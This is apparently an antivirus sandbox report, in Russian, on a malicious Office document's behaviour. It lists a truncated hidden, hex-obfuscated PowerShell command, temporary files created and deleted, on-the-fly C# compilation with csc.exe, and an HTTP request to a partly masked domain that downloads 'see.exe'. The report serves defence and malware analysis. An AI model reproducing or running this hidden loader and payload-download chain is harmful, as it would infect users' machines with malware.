Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function u91f2b8 { param($o41561) $gbda36 = 'cefe2';$e85339 = ''; for ($i = 0; $i -lt $o41561.length; $i+=2) { $n6c97 = [convert]::ToByte($o41561.Substring($i, 2), 16)...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\package.json
- %TEMP%\ninhj3xs.0.cs
- %TEMP%\ninhj3xs.cmdline
- %TEMP%\ninhj3xs.out
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{25ddd22a-beb6-4651-83b1-6d074617b803}.tmp
- %TEMP%\csc6e1d.tmp
- %TEMP%\res6e2e.tmp
- %TEMP%\ninhj3xs.dll
Удаляет следующие файлы
- %TEMP%\res6e2e.tmp
- %TEMP%\csc6e1d.tmp
- %TEMP%\ninhj3xs.cmdline
- %TEMP%\ninhj3xs.0.cs
- %TEMP%\ninhj3xs.out
- %TEMP%\ninhj3xs.pdb
- %TEMP%\ninhj3xs.dll
- %TEMP%\package.json
Сетевая активность
TCP
Запросы HTTP GET
- http://ze####hbusiness.com/loki/temp/css/html/see.exe
UDP
- DNS ASK ze####hbusiness.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ninhj3xs.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6E2E.tmp" "%TEMP%\CSC6E1D.tmp"' (со скрытым окном)
Запускает на исполнение
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ninhj3xs.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6E2E.tmp" "%TEMP%\CSC6E1D.tmp"
